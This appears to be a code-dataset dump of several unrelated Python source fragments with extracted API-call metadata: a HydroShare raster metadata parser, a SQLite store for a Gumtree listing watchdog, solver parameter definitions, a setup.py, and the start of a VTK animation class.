super(RasterResourceMeta, self).write_metadata_to_resource(resource)
if self.cell_info:
resource.metadata.cellInformation.delete()
resource.metadata.create_element('CellInformation', name=self.cell_info.name,
rows=self.cell_info.rows,
columns=self.cell_info.columns,
cellSizeXValue=self.cell_info.cellSizeXValue,
cellSizeYValue=self.cell_info.cellSizeYValue,
cellDataType=self.cell_info.cellDataType,
noDataValue=self.cell_info.noDataValue)
if len(self.band_info) > 0:
for band in resource.metadata.bandInformation:
band.delete()
for b in self.band_info:
resource.metadata.create_element('BandInformation', name=b.name,
variableName=b.variableName,
variableUnit=b.variableUnit, method=b.method,
comment=b.comment)
if self.spatial_reference:
resource.metadata.originalCoverage.delete()
values = {'units': self.spatial_reference.units,
'northlimit': self.spatial_reference.northlimit,
'eastlimit': self.spatial_reference.eastlimit,
'southlimit': self.spatial_reference.southlimit,
'westlimit': self.spatial_reference.westlimit,
'projection': self.spatial_reference.projection}
kwargs = {'value': values}
resource.metadata.create_element('OriginalCoverage', **kwargs)
class CellInformation(object):
def __init__(self):
self.name = None
self.rows = None
self.columns = None
self.cellSizeXValue = None
self.cellSizeYValue = None
self.cellDataType = None
self.noDataValue = None # Optional
def __str__(self):
msg = "CellInformation name: {name}, "
msg += "rows: {rows}, columns: {columns}, "
msg += "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
msg += "cellDataType: {cellDataType}, noDataValue: {noDataValue}"
msg = msg.format(name=self.name, rows=self.rows,
columns=self.columns, cellSizeXValue=self.cellSizeXValue,
cellSizeYValue=self.cellSizeYValue, cellDataType=self.cellDataType,
noDataValue=self.noDataValue)
return msg
def __unicode__(self):
return unicode(str(self))
class BandInformation(object):
def __init__(self):
self.name = None
self.variableName = None
self.variableUnit = None
self.method = None # Optional
self.comment = None # Optional
def __str__(self):
msg = "BandInformation name: {name}, "
msg += "variableName: {variableName}, variableUnit: {variableUnit}, "
msg += "method: {method}, comment: {comment}"
msg = msg.format(name=self.name, variableName=self.variableName,
variableUnit=self.variableUnit, method=self.method,
comment=self.comment)
return msg
def __unicode__(self):
return unicode(str(self))
class SpatialReference(object):
def __init__(self):
self.northlimit = None
self.eastlimit = None
self.southlimit = None
self.westlimit = None
self.units = None
self.projection = None # Optional
def __str__(self):
msg = "SpatialReference northlimit: {northlimit}, "
msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
southlimit=self.southlimit, westlimit=self.westlimit,
units=self.units, projection=self.projection)
return msg
def __unicode__(self):
return unicode(str(self))
def __init__(self, value_str):
kvp = value_str.split(';')
for pair in kvp:
(key, value) = pair.split('=')
key = key.strip()
value = value.strip()
if key == 'name':
self.name = value
elif key == 'eastlimit':
try:
self.eastlimit = float(value)
except Exception as e:
msg = "Unable to parse east limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'northlimit':
try:
self.northlimit = float(value)
except Exception as e:
msg = "Unable to parse north limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'southlimit':
try:
self.southlimit = float(value)
except Exception as e:
msg = "Unable to parse south limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'westlimit':
try:
self.westlimit = float(value)
except Exception as e:
msg = "Unable to parse west limit {0}, error: {1}".format(value,
str(e))
raise GenericResourceMeta.ResourceMetaException(msg)
elif key == 'units':
self.units = value
elif key == 'projection':
self.projection = value
class RasterResourceSAXHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
# Content
self.band_info = []
# State variables
self._get_bandinfo = False
self._get_bandinfo_details = False
self._get_bandinfo_name = False
self._bandinfo_name = None
self._get_bandinfo_var_name = False
self._bandinfo_var_name = None
self._get_bandinfo_var_unit = False
self._bandinfo_var_unit = None
self._get_bandinfo_method = False
self._bandinfo_method = None
self._get_bandinfo_comment = False
self._bandinfo_comment = None
def characters(self, content):
if self._get_bandinfo_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information name."
raise xml.sax.SAXException(msg)
self._bandinfo_name.append(content)
elif self._get_bandinfo_var_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable name."
raise xml.sax.SAXException(msg)
self._bandinfo_var_name.append(content)
elif self._get_bandinfo_var_unit:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information variable unit."
raise xml.sax.SAXException(msg)
self._bandinfo_var_unit.append(content)
elif self._get_bandinfo_method:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information method."
raise xml.sax.SAXException(msg)
self._bandinfo_method.append(content)
elif self._get_bandinfo_comment:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
msg += "yet trying to store band information comment."
raise xml.sax.SAXException(msg)
self._bandinfo_comment.append(content)
def startElement(self, name, attrs):
if name == 'hsterms:BandInformation':
if self._get_bandinfo:
raise xml.sax.SAXException("Error: nested hsterms:BandInformation elements.")
self._get_bandinfo = True
elif name == 'rdf:Description':
if self._get_bandinfo:
if self._get_bandinfo_details:
msg = "Error: nested rdf:Description elements " \
"within hsterms:BandInformation element."
raise xml.sax.SAXException(msg)
# Create new band info
self.band_info.append(RasterResourceMeta.BandInformation())
self._get_bandinfo_details = True
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if self._get_bandinfo_name:
raise xml.sax.SAXException("Error: nested hsterms:name elements "
"within hsterms:BandInformation.")
self._get_bandinfo_name = True
self._bandinfo_name = []
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if self._get_bandinfo_var_name:
raise xml.sax.SAXException("Error: nested hsterms:variableName elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_name = True
self._bandinfo_var_name = []
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if self._get_bandinfo_var_unit:
raise xml.sax.SAXException("Error: nested hsterms:variableUnit elements "
"within hsterms:BandInformation.")
self._get_bandinfo_var_unit = True
self._bandinfo_var_unit = []
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if self._get_bandinfo_method:
raise xml.sax.SAXException("Error: nested hsterms:method elements "
"within hsterms:BandInformation.")
self._get_bandinfo_method = True
self._bandinfo_method = []
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if self._get_bandinfo_comment:
raise xml.sax.SAXException("Error: nested hsterms:comment elements "
"within hsterms:BandInformation.")
self._get_bandinfo_comment = True
self._bandinfo_comment = []
def endElement(self, name):
if name == 'hsterms:BandInformation':
if not self._get_bandinfo:
msg = "Error: close hsterms:BandInformation tag without corresponding open tag."
raise xml.sax.SAXException(msg)
self._get_bandinfo = False
elif name == 'rdf:Description':
if self._get_bandinfo:
if not self._get_bandinfo_details:
msg = "Error: close rdf:Description tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self._get_bandinfo_details = False
elif name == 'hsterms:name':
if self._get_bandinfo_details:
if not self._get_bandinfo_name:
msg = "Error: close hsterms:name tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].name = "".join(self._bandinfo_name)
self._bandinfo_name = None
self._get_bandinfo_name = False
elif name == 'hsterms:variableName':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_name:
msg = "Error: close hsterms:variableName tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableName = "".join(self._bandinfo_var_name)
self._bandinfo_var_name = None
self._get_bandinfo_var_name = False
elif name == 'hsterms:variableUnit':
if self._get_bandinfo_details:
if not self._get_bandinfo_var_unit:
msg = "Error: close hsterms:variableUnit tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].variableUnit = "".join(self._bandinfo_var_unit)
self._bandinfo_var_unit = None
self._get_bandinfo_var_unit = False
elif name == 'hsterms:method':
if self._get_bandinfo_details:
if not self._get_bandinfo_method:
msg = "Error: close hsterms:method tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].method = "".join(self._bandinfo_method)
self._bandinfo_method = None
self._get_bandinfo_method = False
elif name == 'hsterms:comment':
if self._get_bandinfo_details:
if not self._get_bandinfo_comment:
msg = "Error: close hsterms:comment tag without corresponding open tag "
msg += "within hsterms:BandInformation."
raise xml.sax.SAXException(msg)
self.band_info[-1].comment = "".join(self._bandinfo_comment)
self._bandinfo_comment = None
self._get_bandinfo_comment = False
| [
"rdflib.namespace.Namespace",
"hs_core.serialization.GenericResourceMeta.ResourceMetaException"
] | [((876, 934), 'rdflib.namespace.Namespace', 'rdflib.namespace.Namespace', (['"""http://hydroshare.org/terms/"""'], {}), "('http://hydroshare.org/terms/')\n", (902, 934), False, 'import rdflib\n'), ((1387, 1433), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (1428, 1433), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((1758, 1804), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (1799, 1804), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((2149, 2195), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (2190, 2195), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((2593, 2639), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (2634, 2639), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((3044, 3090), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (3085, 3090), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((3491, 3537), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (3532, 3537), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((6339, 6385), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (6380, 6385), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((4525, 4571), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (4566, 4571), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((4939, 4985), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (4980, 4985), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((5364, 5410), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (5405, 5410), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((11907, 11953), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (11948, 11953), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((12330, 12376), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (12371, 12376), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((12753, 12799), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (12794, 12799), False, 'from hs_core.serialization import GenericResourceMeta\n'), ((13172, 13218), 'hs_core.serialization.GenericResourceMeta.ResourceMetaException', 'GenericResourceMeta.ResourceMetaException', (['msg'], {}), '(msg)\n', (13213, 13218), False, 'from hs_core.serialization import GenericResourceMeta\n')] |
import os
import os.path
import sqlite3
import logging
from typing import List
from gumtree_watchdog.types import Listing, Contract, ListingWithChatId
TConn = sqlite3.Connection
DB_PATH = os.environ.get('GUMTREE_DB')
def get_connection() -> TConn:
if not DB_PATH:
raise Exception("Please specify Sqlite3 db path as environment variable GUMTREE_DB")
conn = sqlite3.connect(DB_PATH)
conn.row_factory = sqlite3.Row
return conn
def initialize():
if os.path.isfile(DB_PATH):
logging.info("Sqlite3 database found.")
return
logging.warning("Sqlite3 database not found, will initialize.")
with get_connection() as conn:
conn.execute("""
CREATE TABLE contract(
contract_id integer primary key autoincrement,
query text not null,
chat_id integer not null,
is_active bool default 0,
UNIQUE(chat_id, query)
);
""")
conn.execute("""
CREATE TABLE listing(
listing_id integer primary key autoincrement,
contract_id integer not null,
ad_id text not null,
title text not null,
description text not null,
url text,
must_notify_user bool default 1,
FOREIGN KEY(contract_id) REFERENCES contract(contract_id),
UNIQUE(contract_id, ad_id)
);
""")
conn.execute("""
CREATE TABLE inbound_msg(
inbound_msg_id integer primary key autoincrement,
chat_id integer not null,
message text not null
);
""")
def insert_inbound_msg(conn: TConn, chat_id: int, message: str):
conn.execute("""
INSERT INTO inbound_msg (chat_id, message) VALUES (:chat_id, :message)
""", dict(
chat_id=chat_id,
message=message
))
def insert_contract(conn: TConn, chat_id: int, query: str) -> int:
cur = conn.cursor()
cur.execute("""
INSERT INTO contract (chat_id, query) VALUES (:chat_id, :query)
""", dict(
chat_id=chat_id,
query=query
))
return cur.lastrowid
def insert_listing(conn: TConn, record: Listing) -> bool:
existing_results = conn.execute("""
SELECT listing_id
FROM listing
WHERE contract_id = :contract_id AND ad_id = :ad_id
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id
)).fetchall()
if existing_results:
return False
conn.execute("""
INSERT INTO listing
(contract_id, ad_id, url, title, description)
VALUES
(:contract_id, :ad_id, :url,:title, :description)
""", dict(
contract_id=record.contract_id,
ad_id=record.ad_id,
url=record.url,
title=record.title,
description=record.description
))
return True
def get_open_contracts(conn: TConn) -> List[Contract]:
results = conn.execute("""
SELECT * FROM contract WHERE is_active = 1;
""").fetchall()
return [Contract(**_) for _ in results]
def get_open_contracts_for_user(conn: TConn, chat_id: int) -> List[Contract]:
results = conn.execute("""
SELECT *
FROM contract
WHERE is_active = 1
AND chat_id = :chat_id
""", dict(
chat_id=chat_id
)).fetchall()
return [Contract(**_) for _ in results]
def get_unsent_listing_notifications(conn: TConn) -> List[ListingWithChatId]:
results = conn.execute("""
SELECT listing_id, ad_id, chat_id, url, title, description
FROM listing
JOIN contract USING (contract_id)
WHERE must_notify_user = 1
AND contract.is_active = 1
""").fetchall()
return [ListingWithChatId(**_) for _ in results]
def mark_listing_as_sent(conn: TConn, listing_id: int):
return conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE listing_id = :listing_id
""", dict(listing_id=listing_id))
def deactivate_contract(conn: TConn, chat_id: str, contract_id: int):
conn.execute("""
UPDATE contract
SET is_active = 0
WHERE contract_id = :contract_id
AND chat_id = :chat_id
""", dict(contract_id=contract_id, chat_id=chat_id))
def mark_contract_active(conn: TConn, contract_id: int):
conn.execute("""
UPDATE listing
SET must_notify_user = 0
WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
conn.execute("""
UPDATE contract
SET is_active = 1 WHERE contract_id = :contract_id
""", dict(contract_id=contract_id))
| [
"sqlite3.connect",
"gumtree_watchdog.types.ListingWithChatId",
"logging.warning",
"os.environ.get",
"os.path.isfile",
"gumtree_watchdog.types.Contract",
"logging.info"
] | [((189, 217), 'os.environ.get', 'os.environ.get', (['"""GUMTREE_DB"""'], {}), "('GUMTREE_DB')\n", (203, 217), False, 'import os\n'), ((375, 399), 'sqlite3.connect', 'sqlite3.connect', (['DB_PATH'], {}), '(DB_PATH)\n', (390, 399), False, 'import sqlite3\n'), ((478, 501), 'os.path.isfile', 'os.path.isfile', (['DB_PATH'], {}), '(DB_PATH)\n', (492, 501), False, 'import os\n'), ((571, 634), 'logging.warning', 'logging.warning', (['"""Sqlite3 database not found, will initialize."""'], {}), "('Sqlite3 database not found, will initialize.')\n", (586, 634), False, 'import logging\n'), ((511, 550), 'logging.info', 'logging.info', (['"""Sqlite3 database found."""'], {}), "('Sqlite3 database found.')\n", (523, 550), False, 'import logging\n'), ((3204, 3217), 'gumtree_watchdog.types.Contract', 'Contract', ([], {}), '(**_)\n', (3212, 3217), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n'), ((3538, 3551), 'gumtree_watchdog.types.Contract', 'Contract', ([], {}), '(**_)\n', (3546, 3551), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n'), ((3945, 3967), 'gumtree_watchdog.types.ListingWithChatId', 'ListingWithChatId', ([], {}), '(**_)\n', (3962, 3967), False, 'from gumtree_watchdog.types import Listing, Contract, ListingWithChatId\n')] |
#section [initial]
def _parameters_accessors_checks():
from finess.params import Parameter, Accessor, Check, \
CheckGreaterEqual, CheckGreaterThan, \
CheckOneOf, EnumParameterType
parameters = []
checks = []
rhol = Parameter(variable_name = "rhol",
section = "initial",
name = "rhol",
type_ = "double")
parameters.append(rhol)
checks.append(CheckGreaterThan(rhol, 0.0))
unl = Parameter(variable_name = "unl",
section = "initial",
name = "unl",
type_ = "double")
parameters.append(unl)
utl = Parameter(variable_name = "utl",
section = "initial",
name = "utl",
type_ = "double")
parameters.append(utl)
u3l = Parameter(variable_name = "u3l",
section = "initial",
name = "u3l",
type_ = "double")
parameters.append(u3l)
pl = Parameter(variable_name = "pl",
section = "initial",
name = "pl",
type_ = "double")
parameters.append(pl)
checks.append(CheckGreaterThan(pl, 0.0))
Bnl = Parameter(variable_name = "Bnl",
section = "initial",
name = "Bnl",
type_ = "double")
parameters.append(Bnl)
Btl = Parameter(variable_name = "Btl",
section = "initial",
name = "Btl",
type_ = "double")
parameters.append(Btl)
B3l = Parameter(variable_name = "B3l",
section = "initial",
name = "B3l",
type_ = "double")
parameters.append(B3l)
rhor = Parameter(variable_name = "rhor",
section = "initial",
name = "rhor",
type_ = "double")
parameters.append(rhor)
checks.append(CheckGreaterThan(rhor, 0.0))
unr = Parameter(variable_name = "unr",
section = "initial",
name = "unr",
type_ = "double")
parameters.append(unr)
utr = Parameter(variable_name = "utr",
section = "initial",
name = "utr",
type_ = "double")
parameters.append(utr)
u3r = Parameter(variable_name = "u3r",
section = "initial",
name = "u3r",
type_ = "double")
parameters.append(u3r)
pr = Parameter(variable_name = "pr",
section = "initial",
name = "pr",
type_ = "double")
parameters.append(pr)
checks.append(CheckGreaterThan(pr, 0.0))
Bnr = Parameter(variable_name = "Bnr",
section = "initial",
name = "Bnr",
type_ = "double")
parameters.append(Bnr)
Btr = Parameter(variable_name = "Btr",
section = "initial",
name = "Btr",
type_ = "double")
parameters.append(Btr)
B3r = Parameter(variable_name = "B3r",
section = "initial",
name = "B3r",
type_ = "double")
parameters.append(B3r)
return parameters, map(Accessor, parameters), checks
parameter_list, accessor_list, check_list = \
_parameters_accessors_checks()
| [
"finess.params.CheckGreaterThan",
"finess.params.Parameter"
] | [((280, 359), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""rhol"""', 'section': '"""initial"""', 'name': '"""rhol"""', 'type_': '"""double"""'}), "(variable_name='rhol', section='initial', name='rhol', type_='double')\n", (289, 359), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((521, 598), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""unl"""', 'section': '"""initial"""', 'name': '"""unl"""', 'type_': '"""double"""'}), "(variable_name='unl', section='initial', name='unl', type_='double')\n", (530, 598), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((709, 786), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""utl"""', 'section': '"""initial"""', 'name': '"""utl"""', 'type_': '"""double"""'}), "(variable_name='utl', section='initial', name='utl', type_='double')\n", (718, 786), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((897, 974), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""u3l"""', 'section': '"""initial"""', 'name': '"""u3l"""', 'type_': '"""double"""'}), "(variable_name='u3l', section='initial', name='u3l', type_='double')\n", (906, 974), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1084, 1159), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""pl"""', 'section': '"""initial"""', 'name': '"""pl"""', 'type_': '"""double"""'}), "(variable_name='pl', section='initial', name='pl', type_='double')\n", (1093, 1159), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1311, 1388), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Bnl"""', 'section': '"""initial"""', 'name': '"""Bnl"""', 'type_': '"""double"""'}), "(variable_name='Bnl', section='initial', name='Bnl', type_='double')\n", (1320, 1388), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1499, 1576), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Btl"""', 'section': '"""initial"""', 'name': '"""Btl"""', 'type_': '"""double"""'}), "(variable_name='Btl', section='initial', name='Btl', type_='double')\n", (1508, 1576), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1687, 1764), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""B3l"""', 'section': '"""initial"""', 'name': '"""B3l"""', 'type_': '"""double"""'}), "(variable_name='B3l', section='initial', name='B3l', type_='double')\n", (1696, 1764), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1876, 1955), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""rhor"""', 'section': '"""initial"""', 'name': '"""rhor"""', 'type_': '"""double"""'}), "(variable_name='rhor', section='initial', name='rhor', type_='double')\n", (1885, 1955), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2117, 2194), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""unr"""', 'section': '"""initial"""', 'name': '"""unr"""', 'type_': '"""double"""'}), "(variable_name='unr', section='initial', name='unr', type_='double')\n", (2126, 2194), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2305, 2382), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""utr"""', 'section': '"""initial"""', 'name': '"""utr"""', 'type_': '"""double"""'}), "(variable_name='utr', section='initial', name='utr', type_='double')\n", (2314, 2382), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2493, 2570), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""u3r"""', 'section': '"""initial"""', 'name': '"""u3r"""', 'type_': '"""double"""'}), "(variable_name='u3r', section='initial', name='u3r', type_='double')\n", (2502, 2570), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2680, 2755), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""pr"""', 'section': '"""initial"""', 'name': '"""pr"""', 'type_': '"""double"""'}), "(variable_name='pr', section='initial', name='pr', type_='double')\n", (2689, 2755), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2907, 2984), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Bnr"""', 'section': '"""initial"""', 'name': '"""Bnr"""', 'type_': '"""double"""'}), "(variable_name='Bnr', section='initial', name='Bnr', type_='double')\n", (2916, 2984), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((3095, 3172), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""Btr"""', 'section': '"""initial"""', 'name': '"""Btr"""', 'type_': '"""double"""'}), "(variable_name='Btr', section='initial', name='Btr', type_='double')\n", (3104, 3172), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((3283, 3360), 'finess.params.Parameter', 'Parameter', ([], {'variable_name': '"""B3r"""', 'section': '"""initial"""', 'name': '"""B3r"""', 'type_': '"""double"""'}), "(variable_name='B3r', section='initial', name='B3r', type_='double')\n", (3292, 3360), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((477, 504), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['rhol', '(0.0)'], {}), '(rhol, 0.0)\n', (493, 504), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((1269, 1294), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['pl', '(0.0)'], {}), '(pl, 0.0)\n', (1285, 1294), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2073, 2100), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['rhor', '(0.0)'], {}), '(rhor, 0.0)\n', (2089, 2100), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n'), ((2865, 2890), 'finess.params.CheckGreaterThan', 'CheckGreaterThan', (['pr', '(0.0)'], {}), '(pr, 0.0)\n', (2881, 2890), False, 'from finess.params import Parameter, Accessor, Check, CheckGreaterEqual, CheckGreaterThan, CheckOneOf, EnumParameterType\n')] |
from setuptools import setup
import os
with open("README.md", "r", encoding="utf-8") as f:
long_description = f.read()
requirements = []
if os.path.isfile("./requirements.txt"):
with open("requirements.txt", "r") as f:
requirements = f.read()
requirements = [x for x in requirements.split("\n") if x != ""]
setup(
name="ma5_expert",
version="0.0.1",
description=("MadAnalysis 5 interpreter for Expert mode"),
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jackaraz/ma5_expert",
author="<NAME>",
author_email=("<EMAIL>"),
license="MIT",
packages=[
"ma5_expert",
"ma5_expert.CutFlow",
"ma5_expert.tools",
],
install_requires=requirements,
python_requires=">=3.6",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Physics",
],
)
| [
"os.path.isfile",
"setuptools.setup"
] | [((146, 182), 'os.path.isfile', 'os.path.isfile', (['"""./requirements.txt"""'], {}), "('./requirements.txt')\n", (160, 182), False, 'import os\n'), ((330, 1000), 'setuptools.setup', 'setup', ([], {'name': '"""ma5_expert"""', 'version': '"""0.0.1"""', 'description': '"""MadAnalysis 5 interpreter for Expert mode"""', 'long_description': 'long_description', 'long_description_content_type': '"""text/markdown"""', 'url': '"""https://github.com/jackaraz/ma5_expert"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'packages': "['ma5_expert', 'ma5_expert.CutFlow', 'ma5_expert.tools']", 'install_requires': 'requirements', 'python_requires': '""">=3.6"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Physics']"}), "(name='ma5_expert', version='0.0.1', description=\n 'MadAnalysis 5 interpreter for Expert mode', long_description=\n long_description, long_description_content_type='text/markdown', url=\n 'https://github.com/jackaraz/ma5_expert', author='<NAME>', author_email\n ='<EMAIL>', license='MIT', packages=['ma5_expert', 'ma5_expert.CutFlow',\n 'ma5_expert.tools'], install_requires=requirements, python_requires=\n '>=3.6', classifiers=['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering :: Physics'])\n", (335, 1000), False, 'from setuptools import setup\n')] |
import time
import numpy as np
import vtk
from vtk.util import numpy_support
from svtk.lib.toolbox.integer import minmax
from svtk.lib.toolbox.idarray import IdArray
from svtk.lib.toolbox.numpy_helpers import normalize
import math as m
class VTKAnimationTimerCallback(object):
"""This class is called every few milliseconds by VTK based on the set frame rate. This allows for animation.
I've added several modification functions, such as adding and deleting lines/points, changing colors, etc."""
__slots__ = ["points", "point_colors", "timer_count", "points_poly",
"lines", "lines_poly", "line_colors", "line_id_array"
"last_velocity_update", "unused_locations",
"last_color_velocity_update", "renderer", "last_bg_color_velocity_update",
"last_velocity_update", "_loop_time", "remaining_lerp_fade_time", "lerp_multiplier",
"line_id_array", "point_id_array", "point_vertices", "interactor_style", "renderer",
"interactive_renderer", "_started"
]
def __init__(self):
self.timer_count = 0
self.last_velocity_update = time.clock()
self.last_color_velocity_update = time.clock()
self.last_bg_color_velocity_update = time.clock()
self._loop_time = time.clock()
self.unused_locations = []
self.remaining_lerp_fade_time = 0
self.lerp_multiplier = 1
self.line_id_array = IdArray()
self.point_id_array = IdArray()
self._started=False
def add_lines(self, lines, line_colors):
"""
Adds multiple lines between any sets of points.
Args:
